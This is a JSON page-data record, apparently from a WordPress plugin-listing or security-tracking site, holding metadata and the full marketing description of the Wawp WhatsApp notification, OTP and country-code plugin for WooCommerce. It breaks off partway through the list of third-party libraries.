[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f-b43yL3eId3Rl6zkQ3RGix9tNbSJrJtkw9NY8zgA2wI":3,"$fyxWylwhK1fOw4awcaywV3yqWqZiaiUpWbBNhNSgcylk":182,"$fwKwLjj7jrUc8h3d7F3f1rA-zvxdKpArAhqgj4_Sx5wE":187},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":13,"last_updated":14,"tested_up_to":15,"requires_at_least":16,"requires_php":17,"tags":18,"homepage":24,"download_link":25,"security_score":26,"vuln_count":27,"unpatched_count":13,"last_vuln_date":28,"fetched_at":29,"discovery_status":30,"vulnerabilities":31,"developer":76,"crawl_stats":37,"alternatives":82,"analysis":37,"fingerprints":37},"automation-web-platform","Automation Web Platform – Notifications and OTP for WooCommerce, Advanced Country Code","4.8.6","Information Technology","https:\u002F\u002Fprofiles.wordpress.org\u002F101gen\u002F","\u003Cp>Tired of manually sending WhatsApp order updates, tracking numbers, and payment follow-ups? Let \u003Cstrong>Wawp\u003C\u002Fstrong> handle it all on autopilot right from your WhatsApp!\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Wawp (Automation Web Platform)\u003C\u002Fstrong> is the ultimate all-in-one automation and security toolkit for WooCommerce and WordPress. It bridges the gap between your online store and WhatsApp, helping you boost conversion rates, eliminate fake orders, and retain customers with zero effort.\u003C\u002Fp>\n\u003Ch3>🚀 What makes Wawp a Game-Changer?\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Smart Automated Notifications:\u003C\u002Fstrong> Send instant WhatsApp alerts to customers and admin for new orders, status updates, pending payments, and product reviews.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Bulletproof Security (OTP Authentication):\u003C\u002Fstrong> Secure your forms with Google reCAPTCHA, WhatsApp OTP, and Email verification to stop spam bots and fake registrations.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>WooCommerce Order Verification:\u003C\u002Fstrong> Validate checkouts based on payment or shipping methods using real-time gateway checks to drastically reduce Cash on Delivery (COD) fraud.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Advanced Phone Field & Country Code:\u003C\u002Fstrong> Auto-detect visitor locations, format numbers dynamically, and validate prefixes instantly.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Interactive Chat Widget:\u003C\u002Fstrong> Support multi-agent routing, display conditions, and auto-generated QR codes to talk directly with your store visitors.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Omnisearch & Global Access:\u003C\u002Fstrong> Instantly find logs, messages, and configurations across your entire dashboard using the built-in \u003Ca href=\"https:\u002F\u002Fhelp.wawp.net\u002Fen\u002Farticles\u002Fwawp-global-omnisearch\" rel=\"nofollow ugc\">Global Omnisearch Engine\u003C\u002Fa>.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>More automation, less work—sell smarter and grow faster with Wawp! ✨\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Ch3>⚠️ Important Notice (SaaS Integration)\u003C\u002Fh3>\n\u003Cp>This plugin acts as a gateway and relies on the \u003Cstrong>Wawp.net SaaS service\u003C\u002Fstrong> to handle encrypted WhatsApp Web connection, API routing, and cloud delivery.\u003Cbr \u002F>\n* To unlock all core features, a Wawp account is required.\u003Cbr \u002F>\n* New accounts get \u003Cstrong>120 free messages per month\u003C\u002Fstrong> out of the box!\u003Cbr \u002F>\n* \u003Cstrong>Get Started:\u003C\u002Fstrong> \u003Ca href=\"https:\u002F\u002Fapp.wawp.net\u002Fsignup\" rel=\"nofollow ugc\">Create your free account here\u003C\u002Fa>\u003Cbr \u002F>\n* \u003Cstrong>Legal:\u003C\u002Fstrong> Review our \u003Ca href=\"https:\u002F\u002Fwawp.net\u002Fterms-of-services\u002F\" rel=\"nofollow ugc\">Terms of Service\u003C\u002Fa> and \u003Ca href=\"https:\u002F\u002Fwawp.net\u002Fprivacy-policy\u002F\" rel=\"nofollow ugc\">Privacy Policy\u003C\u002Fa>.\u003C\u002Fp>\n\u003Ch3>💎 Unlock Premium Growth (Wawp PRO Features)\u003C\u002Fh3>\n\u003Cp>Upgrade to our premium plans to unlock enterprise-grade marketing and advanced communication workflows designed to scale your store’s conversions:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>Abandoned Cart Recovery:\u003C\u002Fstrong> Automatically target and recover lost sales by sending personalized WhatsApp reminders to customers who leave checkout early.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Bulk Campaigns & Broadcasts:\u003C\u002Fstrong> Send mass marketing campaigns and targeted promotional updates to your customer list with intelligent protection tools.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Official Meta API (WhatsApp Cloud API):\u003C\u002Fstrong> Scale to unlimited messaging with a robust, cloud-based business gateway infrastructure.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Firebase SMS Integration:\u003C\u002Fstrong> Bulletproof backup authentication channel utilizing native Firebase phone tokens for global OTP delivery.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Custom & Colored WooCommerce Statuses:\u003C\u002Fstrong> Take absolute control over your workflow by automating and color-coding custom WooCommerce order statuses.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Multilingual Notifications Framework:\u003C\u002Fstrong> Automatically route and translate WhatsApp triggers based on the customer’s selected checkout language.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>AI-Powered Configuration Assistant:\u003C\u002Fstrong> Configure, troubleshoot, and optimize your plugin setup instantly with an integrated AI copilot.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Custom HTML Email Templates:\u003C\u002Fstrong> Go beyond text and design beautiful, high-converting transactional emails to match your store branding.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>👉 \u003Ca href=\"https:\u002F\u002Fwawp.net\u002Fen\u002Fpricing\" rel=\"nofollow ugc\">Check Out Our Premium Pro Plans & Pricing\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>🤖 Automated Notifications\u003C\u002Fh3>\n\u003Cp>Manage and deploy targeted transactional messages using our official \u003Ca href=\"https:\u002F\u002Fhelp.wawp.net\u002Fen\u002Farticles\u002Fautomated-notifications\" rel=\"nofollow ugc\">Automated Notifications Guide\u003C\u002Fa> to ensure absolute delivery accuracy. Craft your texts perfectly with the \u003Ca href=\"https:\u002F\u002Fhelp.wawp.net\u002Fen\u002Farticles\u002Fwhatsapp-message-editor\" rel=\"nofollow ugc\">Wawp Smart WhatsApp Message Editor Documentation\u003C\u002Fa>.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>New Order Notification\u003C\u002Fstrong> – Send WhatsApp messages to customers with full order details immediately after checkout.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Order Status Updates\u003C\u002Fstrong> – Automatically notify customers about updates or shifts in their order status.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Admin\u002FStaff Alerts\u003C\u002Fstrong> – Receive real-time WhatsApp alerts for new orders, high-value checkouts, and system updates.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>After Purchase Upsell\u003C\u002Fstrong> – Schedule automated follow-up messages to re-engage customers and drive repeat sales.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Pending Payments\u003C\u002Fstrong> – Send gentle, automated reminders for pending invoices to recover lost revenue faster.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Product Reviews\u003C\u002Fstrong> – Collect valuable customer reviews on auto-pilot with customized WhatsApp follow-up requests.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Supported Order Statuses:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>Pending Payment\u003C\u002Fstrong> – Notify customers immediately about unpaid orders to recover checkout conversions.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>On Hold\u003C\u002Fstrong> – Inform clients about orders waiting for custom admin or payment confirmation.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Processing\u003C\u002Fstrong> – Let customers know their order is successfully received and being prepared.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Completed\u003C\u002Fstrong> – Confirm successful order packaging, dispatch, or final delivery.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Failed\u003C\u002Fstrong> – Notify customers instantly of failed or declined transactions to prompt a retry.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Draft\u003C\u002Fstrong> – Keep seamless track of unfinished checkout orders and internal layouts.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Canceled\u003C\u002Fstrong> – Alert customers automatically if an order has been canceled by the admin or system.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Refunded\u003C\u002Fstrong> – Inform clients about successful refunds and financial reversals.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Customer Note\u003C\u002Fstrong> – Send custom notes and manual update alerts directly to the customer’s phone.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Custom Status\u003C\u002Fstrong> – Set up tailored automated notifications for \u003Cem>any\u003C\u002Fem> custom order status on your store.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>🔐 User Authentication\u003C\u002Fh3>\n\u003Cp>Deploy bulletproof access management. Review our documentation on \u003Ca href=\"https:\u002F\u002Fhelp.wawp.net\u002Fen\u002Farticles\u002Fabout-authentication-pages-settings\" rel=\"nofollow ugc\">About Authentication Pages Settings\u003C\u002Fa> to secure and optimize your forms.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>Blacklist Numbers\u003C\u002Fstrong> – Block fake accounts, bots, and spam numbers system-wide to prevent SMS\u002FOTP abuse.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Multiple Login Options\u003C\u002Fstrong> – Enable fluid login via WhatsApp OTP, Email OTP, or classic Email & Password. Read the \u003Ca href=\"https:\u002F\u002Fhelp.wawp.net\u002Fen\u002Farticles\u002Fpasswordless-login\" rel=\"nofollow ugc\">Passwordless Login Guide\u003C\u002Fa>.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Signup Verification\u003C\u002Fstrong> – Ensure database quality by verifying new user registers via our optimized \u003Ca href=\"https:\u002F\u002Fhelp.wawp.net\u002Fen\u002Farticles\u002Fregistration-form\" rel=\"nofollow ugc\">Registration Form Framework\u003C\u002Fa>.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Role-Based Redirects\u003C\u002Fstrong> – Automatically route users to custom dynamic pages based on their WordPress role after logging in.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Google reCAPTCHA\u003C\u002Fstrong> – Secure Login, Registration, and Lost Password forms with integrated reCAPTCHA v2\u002Fv3 protection.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Chic Settings UI & Guidance\u003C\u002Fstrong> – Manage components inside a modern interface with smart guidance bars and dark\u002Flight preview updates.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>One-Click Preview\u003C\u002Fstrong> – Instantly view and test your active Login\u002FSignup configurations directly from the backend dashboard.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Shortcodes for Easy Integration\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>Login Form:\u003C\u002Fstrong> \u003Ccode>[wawp_otp_login]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Signup Form:\u003C\u002Fstrong> \u003Ccode>[wawp_signup_form]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Combined Forms:\u003C\u002Fstrong> \u003Ccode>[wawp-fast-login]\u003C\u002Fcode>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>100% Compatible With\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>Page Builders:\u003C\u002Fstrong> Elementor, Bricks Builder, Gutenberg Block Editor.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Forms & Core:\u003C\u002Fstrong> Native WordPress Forms, Native WooCommerce Forms & Checkout.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>🛒 WooCommerce Order Verification\u003C\u002Fh3>\n\u003Cp>Eliminate fraudulent accounts and fake orders by forcing a secure WhatsApp OTP verification badge right before checkout.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>Targeted Verification\u003C\u002Fstrong> – Restrict and trigger OTP prompts for \u003Cem>visitors, members, or everyone\u003C\u002Fem>.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Gateway Dependencies\u003C\u002Fstrong> – Enable OTP gating based on payment methods (e.g., enable strictly for Cash on Delivery (COD)).\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Shipping Gateways\u003C\u002Fstrong> – Trigger phone check verification exclusively for specific shipping options.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>💬 WhatsApp Chat Widget\u003C\u002Fh3>\n\u003Cp>Engage with your visitors directly on their favorite messaging app. Learn how to configure your widget using our \u003Ca href=\"https:\u002F\u002Fhelp.wawp.net\u002Fen\u002Farticles\u002Fwhatsapp-chat-button\" rel=\"nofollow ugc\">WhatsApp Chat Button Guide\u003C\u002Fa>.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>Multi-Agent Support\u003C\u002Fstrong> – Easily assign custom floating contact cards for Support, Sales, or Billing lines.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Display Conditions\u003C\u002Fstrong> – Dynamically control widget visibility based on device criteria or targeted site pages.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Fully Customizable\u003C\u002Fstrong> – Absolute styling control over layout design, coloring, custom icons, and placement.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Social Integrations\u003C\u002Fstrong> – Embed direct social profile shortcuts inside your central floating interface.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Auto-QR Generation\u003C\u002Fstrong> – Instant responsive QR mapping for desktop traffic to scan and chat on mobile.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Click Metrics Analytics\u003C\u002Fstrong> – Track internal widget usage parameters to accurately analyze client engagement.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>🌍 Country Code & Validation\u003C\u002Fh3>\n\u003Cp>Optimize your checkout phone inputs. For step-by-step instructions, read our guide on \u003Ca href=\"https:\u002F\u002Fhelp.wawp.net\u002Fen\u002Farticles\u002Fadvanced-country-code\" rel=\"nofollow ugc\">How to Setup Advanced Country Code\u003C\u002Fa>.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>Number Validation\u003C\u002Fstrong> – Analyze and parse incoming numbers in real-time to avoid entry mistakes.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Auto-Detect Country\u003C\u002Fstrong> – Instantly pre-fill the local country prefix utilizing the visitor’s dynamic location data.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Country Filtering\u003C\u002Fstrong> – Restrict or isolate your dropdown lists to display only the countries your store ships to.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Auto-Formatting Layout\u003C\u002Fstrong> – Numbers adapt, separate, and format dynamically as the end-user types.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Full Theme Harmony\u003C\u002Fstrong> – Works smoothly alongside popular themes without breaking layout styles.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FwZkXX5d5sZk?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\n\u003Ch3>📊 Diagnostics, Privacy & Activity\u003C\u002Fh3>\n\u003Cp>To protect localized data, geolocation runs 100% locally via internal client parameters without relying on external tracking lookup scripts. This plugin maintains a zero-behavior tracking standard.\u003C\u002Fp>\n\u003Cp>Diagnostic metrics and telemetry parameters are monitored locally inside your central analytics logs. Check the official \u003Ca href=\"https:\u002F\u002Fhelp.wawp.net\u002Fen\u002Farticles\u002Factivity-hub\" rel=\"nofollow ugc\">Activity Hub System Guide\u003C\u002Fa> to track connection parameters. Configure your fallback messaging pipelines using our walkthrough on \u003Ca href=\"https:\u002F\u002Fhelp.wawp.net\u002Fen\u002Farticles\u002Fhow-to-setup-smtp-email\" rel=\"nofollow ugc\">How to Setup SMTP Email\u003C\u002Fa>. Data is only shared with the SaaS core if explicit support permission keys are enabled by the administrator.\u003C\u002Fp>\n\u003Ch3>📜 Messages History\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Central Logging Logs\u003C\u002Fstrong> – Track comprehensive delivery profiles including payload, recipient metadata, and timers.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Advanced Queries\u003C\u002Fstrong> – Sort, filter, and isolate specific dispatches using high-performance live search filters.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Failure Identification\u003C\u002Fstrong> – Instantly parse failed logs to quickly troubleshoot and pinpoint delivery network issues.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>One-Click Resend\u003C\u002Fstrong> – Manually re-route or retry failed entries instantly with a single dashboard action.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>🎨 Personalization\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Dynamic Data Fields\u003C\u002Fstrong> – Utilize contextual variables (\u003Ccode>{{customer_name}}\u003C\u002Fcode>, \u003Ccode>{{order_id}}\u003C\u002Fcode>) for highly personalized dispatches.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Native Emoji Utility\u003C\u002Fstrong> – Complete support for modern layout emojis to craft relatable brand voices.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Rich Media Payload\u003C\u002Fstrong> – Embed custom image assets and dynamic attachments into automated message triggers.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>👤 Customer Management\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Status Verification\u003C\u002Fstrong> – Verify if an existing user profile is associated with a verified active WhatsApp account.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Profile Number Linking\u003C\u002Fstrong> – Track and link all historic connection accounts assigned for checkout, login, or notifications.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cblockquote>\n\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong> Administrators can assign entirely independent, distinct WhatsApp sender channels to distribute notifications, system status updates, and OTP tokens separately.\u003C\u002Fp>\n\u003C\u002Fblockquote>\n\u003Ch3>External Services\u003C\u002Fh3>\n\u003Cp>This plugin acts as a gateway to external Software as a Service (SaaS) providers. Use of these services is optional and requires explicit user configuration. To ensure full transparency and compliance, we disclose the following external service integrations:\u003C\u002Fp>\n\u003Ch4>1. Wawp.net (Core Service)\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>Service:\u003C\u002Fstrong> Wawp.net API Gateway\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Description:\u003C\u002Fstrong> Provides the infrastructure for WhatsApp Web connection, message routing, and phone number validation.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Compliance:\u003C\u002Fstrong> All communication is encrypted via HTTPS. Wawp.net does not store your customers’ data beyond the time required for delivery routing.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Data Sent:\u003C\u002Fstrong> Recipient phone number, message payload, site URL, and authentication tokens.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Consent:\u003C\u002Fstrong> Granted by configuring a Wawp Instance and activating any notification trigger.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Policies:\u003C\u002Fstrong> \u003Ca href=\"https:\u002F\u002Fwawp.net\u002Fen\u002Flegal\u002Fterms-of-service\" rel=\"nofollow ugc\">Terms of Service\u003C\u002Fa> | \u003Ca href=\"https:\u002F\u002Fwawp.net\u002Fen\u002Flegal\u002Fprivacy-policy\" rel=\"nofollow ugc\">Privacy Policy\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>2. Meta (WhatsApp Cloud API)\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>Service:\u003C\u002Fstrong> Official WhatsApp Business Platform (graph.facebook.com, connect.facebook.net)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Purpose:\u003C\u002Fstrong> Used for enterprise-grade message delivery via Meta’s official infrastructure.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Data Sent:\u003C\u002Fstrong> Recipient phone number, template parameters, and Meta App credentials.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Consent:\u003C\u002Fstrong> Granted only if the “Meta WhatsApp” channel is explicitly selected and configured.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Policies:\u003C\u002Fstrong> \u003Ca href=\"https:\u002F\u002Fwww.facebook.com\u002Flegal\u002Fcommerce_product_merchant_agreement\" rel=\"nofollow ugc\">Meta Commerce Terms\u003C\u002Fa> | \u003Ca href=\"https:\u002F\u002Fwww.facebook.com\u002Fabout\u002Fprivacy\u002F\" rel=\"nofollow ugc\">Meta Privacy Policy\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>3. WhatsApp (Direct Chat Interaction)\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>Service:\u003C\u002Fstrong> WhatsApp Public API (api.whatsapp.com)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Purpose:\u003C\u002Fstrong> Enables the Chat Widget to redirect users to the WhatsApp application with a pre-filled message.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Data Sent:\u003C\u002Fstrong> Recipient phone number and optional message text. No data is sent automatically; redirection happens only upon user interaction (click).\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Consent:\u003C\u002Fstrong> Granted by enabling the Chat Widget and a user clicking the chat button.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Policies:\u003C\u002Fstrong> \u003Ca href=\"https:\u002F\u002Fwww.whatsapp.com\u002Flegal\u002Fterms-of-service\u002F\" rel=\"nofollow ugc\">WhatsApp Terms\u003C\u002Fa> | \u003Ca href=\"https:\u002F\u002Fwww.whatsapp.com\u002Flegal\u002Fprivacy-policy\u002F\" rel=\"nofollow ugc\">WhatsApp Privacy\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>4. Google reCAPTCHA & Firebase\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>Service:\u003C\u002Fstrong> Security & Authentication Platform\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Purpose:\u003C\u002Fstrong> Prevents bot abuse (reCAPTCHA) and optionally provides OTP verification (Firebase).\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Data Sent:\u003C\u002Fstrong> Device\u002Fapplication information for fraud analysis and phone numbers for verification.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Consent:\u003C\u002Fstrong> Granted when these features are explicitly enabled in settings.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Policies:\u003C\u002Fstrong> \u003Ca href=\"https:\u002F\u002Fpolicies.google.com\u002Fterms\" rel=\"nofollow ugc\">Google Terms\u003C\u002Fa> | \u003Ca href=\"https:\u002F\u002Fpolicies.google.com\u002Fprivacy\" rel=\"nofollow ugc\">Google Privacy\u003C\u002Fa> | \u003Ca href=\"https:\u002F\u002Ffirebase.google.com\u002Fsupport\u002Fprivacy\" rel=\"nofollow ugc\">Firebase Privacy\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>5. WordPress.org API\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>Service:\u003C\u002Fstrong> WordPress Core API (api.wordpress.org)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Purpose:\u003C\u002Fstrong> Used internally by the System Info module to verify if the plugin version matches the latest stable version available.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Data Sent:\u003C\u002Fstrong> Standard HTTP headers required for version checking.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Consent:\u003C\u002Fstrong> Automatic when loading the system info.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Policies:\u003C\u002Fstrong> \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fabout\u002Fprivacy\u002F\" rel=\"ugc\">WordPress.org Privacy Policy\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>6. Geolocation & Privacy\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>Local Processing:\u003C\u002Fstrong> To protect user privacy, geolocation is handled 100% internally using the browser’s timezone API; \u003Cstrong>no external IP-lookup services\u003C\u002Fstrong> (such as ipapi.co or ip-api.com) are used by this plugin.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Zero-Tracking Policy:\u003C\u002Fstrong> This plugin does not collect or track admin behavior. No data is sent to external servers without explicit consent and connection to the respective service.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Dashboard Analytics:\u003C\u002Fstrong> Statistics (message delivery, chat clicks) are generated locally from your site’s database and used only for internal monitoring.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Assets:\u003C\u002Fstrong> All core CSS, JS, and font files are bundled locally to prevent third-party asset tracking.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>📃 How to Start\u003C\u002Fh3>\n\u003Col>\n\u003Cli>Install and activate the Wawp plugin.\u003C\u002Fli>\n\u003Cli>Create a free account on \u003Ca href=\"https:\u002F\u002Fapp.wawp.net\u002Fsignup\" rel=\"nofollow ugc\">Wawp\u003C\u002Fa>.\u003C\u002Fli>\n\u003Cli>Connect your WhatsApp number using a QR code.\u003C\u002Fli>\n\u003Cli>Insert the API keys into the plugin.\u003C\u002Fli>\n\u003Cli>Customize your selected notification messages.\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong> A Wawp account is required to access all plugin features.\u003Cbr \u002F>\n\u003Ca href=\"https:\u002F\u002Fapp.wawp.net\u002Fsignup\" rel=\"nofollow ugc\">\u003Cstrong>Create new account\u003C\u002Fstrong>\u003C\u002Fa>, and send 120 WhatsApp messages per month for Free.\u003C\u002Fp>\n\u003Ch4>Let’s grow, connect, and thrive together!\u003C\u002Fh4>\n\u003Cp>👉 \u003Ca href=\"https:\u002F\u002Fapp.wawp.net\u002Fsignup\" rel=\"nofollow ugc\">\u003Cstrong>Try Wawp for FREE (120 Messages\u002FMonth)\u003C\u002Fstrong>\u003C\u002Fa>\u003Cbr \u002F>\n📌 \u003Ca href=\"https:\u002F\u002Fwww.facebook.com\u002Fgroups\u002Fwawpcommunity\" rel=\"nofollow ugc\">\u003Cstrong>Facebook Community\u003C\u002Fstrong>\u003C\u002Fa> – Join other users for support, advice, and tips.\u003Cbr \u002F>\n📚 \u003Ca href=\"https:\u002F\u002Fhelp.wawp.net\u002Fen\u002Farticles\u002Fhow-to-install-activate-wawp-on-wordpress\" rel=\"nofollow ugc\">\u003Cstrong>Getting Started Tutorials\u003C\u002Fstrong>\u003C\u002Fa> – Access step-by-step installation guides and setup documentation.\u003Cbr \u002F>\n⭐ \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Fplugin\u002Fautomation-web-platform\u002Freviews\u002F#new-post\" rel=\"ugc\">\u003Cstrong>Rate Us on WordPress\u003C\u002Fstrong>\u003C\u002Fa> – Your feedback helps us grow and improve!\u003Cbr \u002F>\n🌍 \u003Ca href=\"https:\u002F\u002Ftranslate.wordpress.org\u002Fprojects\u002Fwp-plugins\u002Fautomation-web-platform\u002F\" rel=\"nofollow ugc\">\u003Cstrong>Help Translate Wawp\u003C\u002Fstrong>\u003C\u002Fa> – Make Wawp localized and accessible globally!\u003Cbr \u002F>\n📽 \u003Ca href=\"https:\u002F\u002Fwww.youtube.com\u002F@wawpapp\" rel=\"nofollow ugc\">\u003Cstrong>Video Tutorials Channel\u003C\u002Fstrong>\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Source Code & Build Tools\u003C\u002Fh3>\n\u003Cp>This plugin uses modern development tools (React, Vite, NPM) to build the administrative dashboard. To comply with WordPress.org guidelines regarding human-readable code:\u003C\u002Fp>\n\u003Col>\n\u003Cli>\u003Cstrong>Plugin Source Code:\u003C\u002Fstrong>\u003Cbr \u002F>\nThe full, non-minified, human-readable source code for the React dashboard is included within this plugin package in the \u003Ccode>app\u002Fsrc\u002F\u003C\u002Fcode> directory.\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Cp>– \u003Cstrong>Main Entry:\u003C\u002Fstrong> \u003Ccode>app\u002Fsrc\u002Findex.tsx\u003C\u002Fcode>\u003Cbr \u002F>\n– \u003Cstrong>Components:\u003C\u002Fstrong> \u003Ccode>app\u002Fsrc\u002Fcomponents\u002F\u003C\u002Fcode>\u003Cbr \u002F>\n– \u003Cstrong>Build Tool:\u003C\u002Fstrong> Vite (configuration in \u003Ccode>app\u002Fvite.config.ts\u003C\u002Fcode>)\u003Cbr \u002F>\n– \u003Cstrong>Build Instructions:\u003C\u002Fstrong> To generate the minified assets in \u003Ccode>app\u002Fdist\u002F\u003C\u002Fcode>, navigate to the \u003Ccode>app\u002F\u003C\u002Fcode> directory and run:\u003Cbr \u002F>\n      npm install\u003Cbr \u002F>\n      npm run build\u003C\u002Fp>\n\u003Col>\n\u003Cli>\u003Cstrong>Third-Party Libraries:\u003C\u002Fstrong>\u003Cbr \u002F>\nThe following libraries are included in minified form for 